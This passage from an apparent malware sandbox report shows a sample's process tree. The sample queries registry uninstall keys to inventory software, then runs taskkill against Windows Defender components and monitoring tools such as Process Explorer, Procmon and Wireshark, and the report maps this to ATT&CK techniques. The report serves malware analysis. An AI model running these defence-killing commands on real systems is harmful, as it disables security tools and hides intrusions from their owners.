    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:5000
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5020
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:5056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:5076
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5096
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:3780
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1864
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:2564
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:3160
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:3572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:3860
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:2248
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:632
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:64
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:2552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:1252
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:660
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:2672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:3660
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1716
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4176
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:4220
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4256
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:4248
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4240
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4160
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4400
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4436
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4484
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4556
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4588
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4640
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:4688
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4708
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4776
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4800
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:4860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:4864
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:4980
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:5092
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:1656
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1156
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:2296
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:3428
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:3860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:1340
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3728
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:500
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2804
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2492
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4264
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4548
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4696

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1780-110-0x0000017649CC0000-0x0000017649CC1000-memory.dmp

Filesize
4KB

Download
memory/1780-98-0x0000017647A20000-0x0000017647A21000-memory.dmp

Filesize
4KB

Download
memory/1780-76-0x00007FF8C8E90000-0x00007FF8C987C000-memory.dmp

Filesize
9.9MB

Download
memory/3816-66-0x000000001BC60000-0x000000001BC64000-memory.dmp

Filesize
16KB

Download